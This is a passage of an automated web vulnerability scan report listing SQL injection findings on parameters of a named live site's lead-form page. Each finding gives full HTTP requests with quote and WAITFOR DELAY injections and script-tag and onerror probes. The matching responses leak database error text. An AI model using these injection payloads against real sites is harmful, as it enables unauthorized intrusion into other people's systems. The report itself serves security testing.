Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:54:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bhumlini8tnt2aciiuedu73286; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.147. http://www.insideup.com/ppc/leadflow/caad00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:04:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=57kk09kp2k0kq7to5dp832kfn1; path=/
Content-Length: 6702
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
<iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011''&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:04:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mqbjojaavpf5dvv6b485mmv924; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.148. http://www.insideup.com/ppc/leadflow/caad00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the website parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:54:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=isn2s5qudibti0n70qsqanmln5; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.149. http://www.insideup.com/ppc/leadflow/caad00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:05:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=65mo8gsv7hhe0a5bkfng2rok72; path=/
Content-Length: 6702
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
<iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:05:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0msssctvgaogpt5hue495kta31; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.150. http://www.insideup.com/ppc/leadflow/caad00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:05:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sap4hj2o0d7vd5g6vviihlg710; path=/
Content-Length: 6702
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
<iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:05:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n69mkanvhm0e8kjl78uigqc2e4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.151. http://www.insideup.com/ppc/leadflow/caad00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the zip parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
